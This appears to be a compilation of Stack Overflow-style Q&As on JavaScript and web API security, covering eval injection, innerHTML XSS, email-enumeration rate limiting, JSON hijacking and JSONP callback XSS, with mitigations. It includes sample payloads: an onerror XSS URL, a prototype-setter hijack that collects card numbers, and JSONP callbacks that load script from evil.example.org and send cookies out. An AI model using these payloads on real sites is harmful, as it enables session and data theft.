I was researching why using the eval() function is bad, and one reason I found is that it makes you vulnerable to code injection attacks (Post: Why is using the JavaScript eval function a bad idea?).
But my question is: do we really need to worry about code injection in JavaScript? After all, if a user wants to run any JS script on a website, he can do it by running it in the console.
So I'm just wondering: what extra harm can it do if someone manages to inject his code into my JavaScript code?
EDIT
Based on Oleander's answer below, I found one vulnerability that arises when the browser communicates with the server through AJAX calls. That makes perfect sense. But I may have JavaScript programs which only run in the browser and have no communication with the backend, for example a calculator or a simple game. So my supplementary question here is: is there any other reason that could make these programs vulnerable too?
Security problems occur when an attacker injects harmful code into a JSON response requested by a user, which is then evaluated using eval.
Imagine the following code being run:
$.get("/get.json", function(data){
    var obj = eval(data); // String to JavaScript object
});
The resource looks like this
GET /get.json
{
some: "data"
}
But an attacker, using a man-in-the-middle attack, replaces the response with:
(function(){
    // send document.cookie to the attacker
})();
The attacker now has access to the user's session.
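The usual mitigation is to parse the response as data instead of evaluating it as code; a minimal sketch against the same hypothetical endpoint:

$.get("/get.json", function (data) {
    // JSON.parse accepts only data, never executable code, so an injected
    // function body throws a SyntaxError instead of running.
    var obj = JSON.parse(data);
});

(Modern jQuery already does this for you when the response is served as application/json or requested via $.getJSON.)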
Well, if your code takes a value from the query string and uses it in an eval, an attacker can entice a victim into visiting a URL containing an evil query string.
From OWASP:
<script>
function loadObj(){
    var cc = eval('(' + aMess + ')');
    document.getElementById('mess').textContent = cc.message;
}

if(window.location.hash.indexOf('message') == -1)
    var aMess = "({\"message\":\"Hello User!\"})";
else
    var aMess = location.hash.substr(window.location.hash.indexOf('message=') + 8);
</script>
The attacker could send an email containing a link, or redirect a user visiting their malicious site to a URL such as
http://example.com/page.html#message=<img src=x onerror="alert('xss')">
Then you have a DOM-based XSS attack.
If your game with no backend lives on a site that also holds other sensitive information, such as user sessions, then it might be possible for the attacker to steal session cookies or grab credentials. It all depends on what the JavaScript has access to: the Same Origin Policy restricts injected script to its hosting domain, but within that domain it has full access. So if you host other sensitive applications there, they could be compromised. If not, then at worst the attacker could abuse the trust a user has in your site by altering content or monitoring what users do on your site.
Related
I'm getting a cross-site scripting (XSS) issue flagged against a JavaScript file in a Veracode scan report.
It seems the issue is with innerHTML?
var b = document.createElement("div");
b.innerHTML = g.responseText; // the flagged line: XHR response parsed as HTML
for (var d = null, b = b.childNodes, e = 0, h = b.length; e < h; ++e) {
    var p = b[e];
    // ...
}
In general, using innerHTML should be avoided unless you know exactly what you're doing.
I'm unfamiliar with Veracode, but I'd wager it's noticing that you're making a fetch request, then inserting data from the response directly into your page as code. It's sounding the alarm about this, as it should. Inserting XHR content directly as HTML is dangerous, as it could allow a malicious actor to execute code on your page in any of the following hypothetical scenarios:
You don't control the endpoint you're querying. Always assume that third-party data is malicious and act to secure your site accordingly.
You control the endpoint, but it becomes compromised. Envision the worst-case scenario, where a hacker breaks in and modifies the data you send to the client.
The endpoint returns unsanitized user input. A user could name themselves <script>alert(1);</script> and cause an alert to appear.
In any of these cases, it's possible for someone to insert a script or other content into a response, which, because you're using innerHTML, will be executed as HTML in the context of the page. This is a textbook example of an XSS (cross-site scripting) vulnerability. Hackers can (and very often do) use exploits like this for malicious purposes, including stealing the passwords, session cookies, and payment information of your end users. You're being warned in your code because hackers could potentially do the same thing to you.
If you're returning HTML code from your endpoint: firstly, don't. Return the data you want to put inside the elements as JSON, then construct the elements yourself on the client side using document.createElement and Node.textContent. This ensures the data you return is never interpreted as HTML code.
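A minimal sketch of that pattern (the endpoint, field names, and container ID here are hypothetical):

fetch("/api/items")                      // hypothetical JSON endpoint
    .then(function (res) { return res.json(); })
    .then(function (items) {
        var list = document.getElementById("item-list"); // hypothetical container
        items.forEach(function (item) {
            var div = document.createElement("div");
            div.textContent = item.name; // set as text, never parsed as HTML
            list.appendChild(div);
        });
    });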
If you're retrieving static, non-HTML data from the endpoint, then you don't even need a workaround: just switch innerHTML to textContent and you'll be on your way.
Imagine the following scenario: a user wants to register on a web page and fills in a form. While he is filling in the form, jQuery keeps checking against a regular expression whether the fields are valid, etc.
Since the email is the primary key the user will log in with after registering, the email field needs to be checked with AJAX to let the user know whether that email is already registered. I want to check it with AJAX to avoid submitting the full form, emptying it, refreshing the page, and so on.
So, when the user has finished filling in the email field, an AJAX request is sent to the server, something like the following link:
example.com/check.php?email=abcdefg@gmail.com
When check.php receives the email, it asks the database whether it exists and returns a message like User already exists if it does, or null if it does not.
The question is: if someone digs through my .js and finds links like that, they could use them to send a large number of requests to find out whether random emails exist. This could lead to heavy database load, or in the worst case even crashes and private-information leaks.
Someone could do a huge for loop to check emails like:
//Getting the response of the following links
example.com/check.php?email=aaaaaaa@gmail.com // Returns null
example.com/check.php?email=aaaaaab@gmail.com // Returns null
example.com/check.php?email=aaaaaac@gmail.com // Returns null
example.com/check.php?email=aaaaaad@gmail.com // Returns User already exists
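In code, that enumeration could look something like this (a hypothetical attacker script against the endpoint above):

var names = ["aaaaaaa", "aaaaaab", "aaaaaac", "aaaaaad"];
names.forEach(function (name) {
    fetch("https://example.com/check.php?email=" + encodeURIComponent(name + "@gmail.com"))
        .then(function (r) { return r.text(); })
        .then(function (body) {
            if (body.indexOf("User already exists") !== -1) {
                console.log(name + "@gmail.com is registered");
            }
        });
});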
---
Since I last accepted the answer, I kept investigating this and found a solution to avoid this behaviour. The following code is Java, but the logic can be applied to any other server-side language.
Before making ANY AJAX request to the server, I request a token from the server. The token looks like this: fmf5p81m6e56n4va3nkfu2ns8n. It is generated by a simple method; it could be made more complex, but this is good enough:
// requires java.math.BigInteger and java.security.SecureRandom
public String getToken() {
    // 130 random bits rendered in base 32 gives a ~26-character token
    return new BigInteger(130, new SecureRandom()).toString(32);
}
When the token is requested, the server does not only return the token: it also returns a small script so that, if someone loads the URL directly in a browser (via the address bar, inspect element, and such), the script runs and the token is cleared from view. The servlet returns something like this:
_html += "<head>"
      + "<script>"
      + "window.onload = function(){"
      + "  document.body.innerHTML = '';"                    // first wipe the body (and the token)
      + "  window.location.href = 'http://mywebsite.com';"   // then navigate away
      + "};"
      + "</script>"
      + "</head>"
      + "<body>"
      + "[" + token + "]"
      + "</body>"
      + "</html>";
This first empties the body, then navigates back to wherever we want. JavaScript/jQuery will, however, receive the entire content as a string, from which I simply extract the substring between [ and ]. The token is only valid for the next request, so every AJAX request has its own unique token; on the second request the token just used is deleted.
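On the client, that extraction could look something like this (a hedged sketch mirroring the servlet call shown further below):

$.ajax({
    url: "http://localhost:8084/mywebsite.com/servlet",
    method: "POST",
    data: "type=AJAX&page=Token"
}).done(function (body) {
    // Pull out the text between the first '[' and the last ']'
    var token = body.substring(body.indexOf("[") + 1, body.lastIndexOf("]"));
    // token is now valid for exactly one follow-up request
});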
After I get the token, I append it as a parameter to whatever link I request, something like this:
ajaxRequestObjet = $.ajax({
    url: "http://localhost:8084/mywebsite.com/servlet", //<-- local Tomcat server
    method: "POST",
    data: "type=AJAX&page=some-article&token=fmf5p81m6e56n4va3nkfu2ns8n"
});
This method works fine against someone who inspects the website manually and tries to use the links, but what about Java/PHP/IIS servers that do this automatically?
For this, check for a header! Something like this:
boolean isAjax = "XMLHttpRequest".equals(request.getHeader("X-Requested-With"));
It will be true if and only if the X-Requested-With header is set to XMLHttpRequest, which browsers' AJAX calls send automatically (note that a non-browser client can still forge this header, so treat it as a hurdle rather than real security)....
There is one last thing to keep in mind: make sure the 'Access-Control-Allow-Origin' header is NOT present in your app, so that JavaScript NOT served from your server won't get access to the server's resources. If this header does not exist, Chrome will return this:
XMLHttpRequest cannot load http://localhost:8084/mywebsite.com/servlet. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost' is therefore not allowed access.
The Java server ran in Tomcat and I had a separate Apache server for these tests; this is the small HTML page on Apache which produced the error above:
<html>
<head>
    <script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
    <script>
        ajaxRequestObjet = $.ajax({
            url: "http://localhost:8084/mywebsite.com/servlet",
            method: "POST",
            data: "type=AJAX&page=Token"
        });

        ajaxRequestObjet.done(function (msg) {
            alert(msg);
        });
    </script>
</head>
<body>
</body>
</html>
While you cannot control this 100%... there are a few options..
Try using the same methods that people use with Captcha scripts..
Basically, when the user loads the form/page, you generate a random string/ID in their PHP session and store it. When they send the AJAX request, have your AJAX call also append the string/ID, and require it server-side before allowing a check to run; otherwise return a 500 header or something.
Using this approach with sessions, you could set an allowed limit of checks (say 5), and once the user has tried more than 5 checks they are required to reload the page or pass a human check (e.g. a Captcha), which then resets their count. You could even allow a total of, say, 30 within 1 hour per IP or something.
Also use smart events to trigger the AJAX check, e.g. field/tab change or a button press, or when a valid email is detected (though note an address ending in .com.au would trigger the check twice, once at .com and again at .com.au).
Basically this way, even if someone sniffed your JS files and tried to automate the email checker, it would require them to find a way to obtain the string/ID that you generate, and would also limit the number of requests they can perform.
Beyond this, there is not too much more you can do easily, but there are still a few other ideas.
Most of them would work around using a PHP session/cookie. For example, if they check and find 3 email addresses, you again set that as a limit and force them to make a manual submission or something.
See how the above suggestion goes for you; any questions, do feel free to ask, though it may take me a day or two to reply as it's the weekend. Also research how Captcha scripts work, as there is plenty of source code for them and they work on the same idea.
Time delays will simply look bad, make your site appear slow, and bug the user with waiting for a response.
You need to limit the number of lookups per session/IP address; otherwise there is always a way to get past these checks. Basically, once they hit a limit, force the user/IP/session to wait a few minutes/hours and verify them with a Captcha script so it cannot be scripted.
Javascript Security / Hiding The Source
While you cannot truly do this, you can generate the JS using a PHP page with a JS header, i.e. <script src='myjscode.php'></script>. This allows PHP to check for a valid session, which stops external requests to an extent, but it is mostly useful for making the JS available only behind a membership/login.
Multiple Checks / If Possible In This Case
Depending on your approach: is this for a user to check whether they already have an account? If so, you could combine the email check with something like their name/country/age/DOB, so they would need to supply two or three correctly matching values before getting a check/response from the AJAX call.
Maybe not in your case, but just thought would add this as well.
The JavaScript code on your website is executed on the user's computer, so there is no way you can stop him from digging through your code. Even if you use a code obfuscator (for example, https://www.javascriptobfuscator.com/), the hacker can debug your application and record all requests sent to the server.
Everything security-relevant has to happen on the server. You could limit the amount of requests from a specific IP address.
You could protect against brute force attacks with something similar to CSRF tokens:
Assign a server-generated ID to every client session. Each request to check.php should include this ID.
check.php should reject requests that do not include an ID, or that include an ID the server did not generate (to prevent attacks with spoofed IDs). It should also rate limit per ID: if a given ID has made a request in (say) the last second, or makes more than n requests in a 10-second interval, it should return an error response. This protects against requests from a single session arriving from several IP addresses (see the sketch after this list).
You should also rate limit by IP address to prevent brute-forcing by opening a large number of web application sessions.
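A minimal sketch of that scheme, assuming a Node/Express backend (the endpoint names, limits, and in-memory storage are all hypothetical; use a real session store in practice):

const express = require("express");
const crypto = require("crypto");

const app = express();
const sessions = new Map(); // session ID -> request-tracking state

// Issue a server-generated session ID.
app.get("/session", (req, res) => {
    const id = crypto.randomBytes(16).toString("hex");
    sessions.set(id, { lastRequest: 0, count: 0, windowStart: Date.now() });
    res.json({ id });
});

// The equivalent of check.php: reject unknown IDs and rate limit per ID.
app.get("/check", (req, res) => {
    const s = sessions.get(req.query.id);
    if (!s) return res.status(403).end();               // missing or spoofed ID
    const now = Date.now();
    if (now - s.lastRequest < 1000) return res.status(429).end(); // >1 req/sec
    if (now - s.windowStart > 10000) { s.windowStart = now; s.count = 0; }
    if (++s.count > 5) return res.status(429).end();    // >n per 10s window
    s.lastRequest = now;
    res.json({ exists: false }); // the real email lookup would go here
});

app.listen(3000);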
There isn't much you can do to prevent an attacker looking up a single, or small number, of specific email addresses - it's an inherent risk with this type of validation.
One approach to resolve this problem could be this:
Suppose you have an AJAX request calling your server to receive a response for a particular user or client. You can have a table in your database where you store a unique token (or hash) for every user, which is checked every time the user makes an AJAX request to the server. If the token in the request matches the one in the table, he is a genuine user. You can also record his number of requests in the table to ensure he is making legitimate requests. I acknowledge this may slow down your app's performance, but it is a safe option to consider. Note: you need to render the token into your HTML page so it can be sent with the AJAX request.
Please comment if you want to know more. I have been using this approach and there has been no problem so far.
Example:
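(A hedged sketch of the client side described above; the meta tag name and endpoint are hypothetical.)

// The server rendered the per-user token into the HTML page, e.g.
// <meta name="api-token" content="fmf5p81m6e56n4va3nkfu2ns8n">
var token = document.querySelector('meta[name="api-token"]').content;

// Send the token along with every AJAX request so the server can verify it.
$.ajax({
    url: "/check.php",
    method: "POST",
    data: { email: "user@example.com", token: token }
});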
This type of attack can be treated the same as any other brute force attack, where the only effective solution is to use a Captcha. But of course, Captchas are a detriment to UX, so you have to consider if the additional security is worth it, especially for an attack that is very unlikely to happen anyway. That said, you may want to use a Captcha on your registration form anyway, to prevent bots from creating accounts.
This sort of attack has a huge cost and little reward for the attacker: there are billions of possible email addresses to test. It could only be worth going to such great lengths if the site in question were particularly sensitive, such as some kind of adult site, where the attacker hopes to blackmail the users he finds.
CloudFlare
Not as good as a Captcha solution but the brute force attack might be detected and prevented by CloudFlare's DDoS system. Also, CF can force Tor users to solve a Captcha before accessing your site, which would prevent an attacker from using Tor as a vehicle for the attack.
IP Rate Limiting
Rate limiting on an IP basis has problems because an attacker who decided to undertake a task as huge as this would likely be using a botnet or some other system of multiple machines to launch the attack.
Consider a large organisation such as a university, where all users share one public IP. One of the users launches an attack on your site; you block his IP, and in the process block everyone else. This countermeasure could actually be used to launch a DoS attack.
Session ID/CSRF Token
Definitely not a solution by itself, because the attacker simply needs to make a request to the page first to obtain the token. It's an additional request to make, but only an inconvenience for the attacker.
First of all: I'd URL-encode the mail address: 'example.com/check.php?email=' . urlencode('abcdefg@gmail.com')
As to your question: when check.php is called, you can
check whether the user's session and IP have sent a request during the last few seconds
if not, write the user's session and IP plus the current timestamp to a helper table and a cookie, and hit your DB
if yes, block the request
But I'm afraid this won't protect you from fraud, because everyone can read your JavaScript, and if someone wants to exploit this, he will find ways.
check.php should, depending on the setup, either be accessible only internally or verify where the connection is being made from. Take a look at this previous question; I hope it might be what you're looking for: how to verify the requesting server in php?
You could use a CSRF token and exit early from your script if you detect a missing or invalid CSRF token. Almost all (if not all) PHP frameworks come with support for this.
Also check this question from the security community: https://security.stackexchange.com/questions/23371/csrf-protection-with-custom-headers-and-without-validating-token
Using PHP, how do you securely authenticate an API call, cross-domain, with the following criteria:
Must be called from a given domain.com/page (no other domain)
Must have a given key
Some background: Please read carefully before answering...
My web application displays a JavaScript widget on a client's website via a call like the one below. So we're talking about cross-domain authentication for a script that should be served only to a genuine client, and only for a given URL!
At the moment the widget can be included on the CLIENT's website with a single line of JavaScript.
Example: client-website.com/page/with/my-widget
<head>
...
<script src="//ws.my-webappserver.com/little-widget/?key=api_key"></script>
...
</head>
Now, in reality this does not call the JavaScript directly but rather a PHP script on my remote server, which sits in front of the actual JavaScript for the purpose of doing some authentication.
The PHP script behind the above call does this first:
checks that the API key ($_REQUEST["key"]) matches the user's record in the database.
checks the referrer's URL ($_SERVER['HTTP_REFERER']) against a record in the database***.
This is simplified, but in essence the server looks like:
if ($_SERVER['HTTP_REFERER'] === "http://client-website.com/page/with/my-widget"
    && $_REQUEST["key"] === "the_long_api_key") {
    header("Content-type: application/x-javascript");
    echo file_get_contents($thewidgetJS_in_secret_location_on_server);
} else {
    // pretend to be a 404 page not found or some funky thing like that
}
***The widget is only allowed to run on CERTAIN websites/pages
Now, here's the problem:
the key is on the client side so anyone can view source and get the key
referrers can be spoofed (by cURL, for example)
And a little snag:
I can't tell the clients to stick the key inside a PHP script on their server, because they could be running any server-side language!
So how can I make my web service secure and only accessible by a given domain/page?
Any help would be really appreciated!
ps: The widget does some uploading to a kind of drop box - so security is key here!
I'd recommend using a whitelist approach to this issue. I'm not entirely sure this will solve the problem; however, I have used a similar technique for a payment processor, which requires you to whitelist server IPs.
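For what it's worth, a minimal sketch of that technique for server-to-server calls (Node/Express assumed; the addresses are hypothetical). Note it only helps when the caller is a server with a fixed IP, not a visitor's browser:

const express = require("express");
const app = express();

// Known client server IPs (hypothetical)
const WHITELIST = new Set(["203.0.113.10", "203.0.113.11"]);

app.use("/little-widget", function (req, res, next) {
    if (!WHITELIST.has(req.ip)) {
        return res.status(404).end(); // pretend the resource doesn't exist
    }
    next();
});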
After reading the famous (and only) article that tries to explain why .asmx services should NOT allow GET requests
(meaning we shouldn't use [ScriptMethod(UseHttpGet = true)]), I still have a question:
Why?
A web service, as its name says, is a service; it shouldn't care whether the request is GET or POST.
Even if a person performs a CSRF, like embedding this in his malicious site:
<script type="text/javascript" src="http://contoso.com/StockService/Stock.asmx/GetQuotes?symbol=msft" />
So what?
From the asmx's point of view, it is just a normal request.
Can someone please point out the problem for me with an example?
EDIT
Many of these problems are solved in newer browsers.
This link shows some other methods, which should be tested against new browsers.
JSON hijacking is briefly explained in this article.
Let's suppose that you have a web service that returns a list of credit card numbers to the currently authenticated user:
[{"id":"1001","ccnum":"4111111111111111","balance":"2345.15"},
{"id":"1002","ccnum":"5555555555554444","balance":"10345.00"},
{"id":"1003","ccnum":"5105105105105100","balance":"6250.50"}]
Here's how the attack could be performed:
Get an authenticated user to visit a malicious page.
The malicious page will try and access sensitive data from the application that the user is logged into. This can be done by embedding a script tag in an HTML page since the same-origin policy does not apply to script tags. <script src="http://<json site>/json_server.php"></script>. The browser will make a GET request to json_server.php and any authentication cookies of the user will be sent along with the request.
At this point, while the malicious site has executed the script, it does not have access to any sensitive data. Access can be gained by using an object prototype setter. In the code below, a setter is bound on Object.prototype that fires whenever an attempt is made to set the "ccnum" property on any object.
var secrets = ""; // accumulator for the stolen values
Object.prototype.__defineSetter__('ccnum', function(obj) {
    secrets = secrets.concat(" ", obj);
});
At this point the malicious site has successfully hijacked the sensitive financial data (ccnum) returned by json_server.php.
There are also other forms of JSON hijacking that do not rely on browser support for the __defineSetter__ function; that's just one way to conduct the attack. There are many others, as described in this article, such as Array constructor clobbering, UTF-7, and ES5 functionality.
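For instance, the (now historical) Array constructor clobbering attack looked roughly like this sketch; in some older browsers, evaluating a bare array literal invoked the page's overridden Array constructor:

// Hypothetical attacker page; this only worked in some older browsers.
var stolen = [];
Array = function () {
    for (var i = 0; i < arguments.length; i++) stolen.push(arguments[i]);
};
// Loading the JSON array via a script tag then runs it through the
// poisoned constructor:
// <script src="http://victim.example/json_server.php"></script>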
For this reason, GET requests returning JSON are disabled by default in ASP.NET.
Well, if you follow the article linked from the one you provided (http://ajax.asp.net/docs/overview/AsynchronousLayerOverview.aspx), you can read on, and the only reason it specifically gives is this:
GET requests are not recommended for method calls that modify data on
the server or that expose critical information. In GET requests, the
message is encoded by the browser into the URL and is therefore an
easier target for tampering. For both GET and POST requests, you
should follow security guidelines to protect sensitive data.
Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether it actually constitutes a vulnerability. I wanted to get the community's opinion to make sure I'm not missing something.
So, as with any jsonp system, we have an endpoint like:
http://foo.com/jsonp?cb=callback123
where the value of the cb parameter is replayed back in the response:
callback123({"foo":"bar"});
Customers have complained that we don't filter out HTML in the cb parameter, so they'll contrive an example like so:
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
Obviously, for a URL that returns the content type text/html this poses a problem: the browser renders that HTML and then executes the potentially malicious JavaScript in the onload handler. This could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing; the user checks the domain, sees that it's one he trusts, and goes ahead and logs in.
But in our case we're setting the content type header to application/javascript, which causes different behaviors in different browsers. Firefox just displays the raw text, whereas IE opens up a "save as..." dialog. I don't consider either of those to be particularly exploitable: the Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it, and the IE user is probably going to be confused by the save-as dialog and hit cancel.
I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the Microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely. Is that the biggest threat here, or is there some other vulnerability that I missed?
(Obviously I'm going to "fix" this by adding filtering that accepts only a valid JavaScript identifier, with some length limit just in case; I just wanted a dialog about what other threats I might have missed.)
Their injection would have to be something like </script><h1>pwned</h1>
It would be relatively trivial for you to verify that $_GET['callback'] (assuming PHP) is a valid JavaScript function name.
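For example, a hedged sketch of such a check, shown here in JavaScript (adapt to your server-side language; the regex and length cap are one reasonable choice, not the only one):

// Accept only dotted JS identifiers like "callback123" or "App.handlers.cb"
function isValidCallback(name) {
    return typeof name === "string"
        && name.length <= 64
        && /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(name);
}

isValidCallback("callback123");                    // true
isValidCallback('<body onload="alert(1)"/><!--');  // false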
The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.
HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.
Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value. The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.
Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. For example, if you had a "Comments" field in your response:
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
then that comment, whose value was x"+alert("haxored")+"y, would be an XSS attack. However, any good JSON encoder prevents that by escaping the double-quote characters.
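For instance, JSON.stringify escapes the quotes, so the hostile value comes back as an inert string:

JSON.stringify({ comment: 'x"+alert("haxored")+"y' });
// -> {"comment":"x\"+alert(\"haxored\")+\"y"}  (a harmless string, not code)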
That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.
Another example would be making two requests like these:
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
which would call:
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
And evil.example.org/x.js would request:
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
which would call:
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
Possibilities are endless.
See Do I need to sanitize the callback parameter from a JSONP call? for an example of sanitizing a JSON callback.
Note: Internet Explorer tends to ignore the Content-Type header by default. It is stubborn, and looks at the first few bytes of the HTTP response directly; if they look kind of like HTML, it will proceed to parse and execute the whole response as text/html, including inline scripts.
There's nothing to stop them from doing something that inserts code, if that is the case.
Imagine a URL such as http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.
As for how this is an attack vector: imagine an HTTP proxy, that is a transparent forwarding proxy for all URLs except http://example.com/jsonp, where it takes the cb part of the query string and prepends some malicious JS before it, and redirects to that URL.
As Pointy indicates, merely calling the URL directly is not exploitable. However, if any of your own JavaScript code calls the JSONP service with user-supplied data and either renders values from the response into the document or eval()s the response (whether now, or sometime in the future as your app evolves), then you have a genuinely exploitable XSS vulnerability.
Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?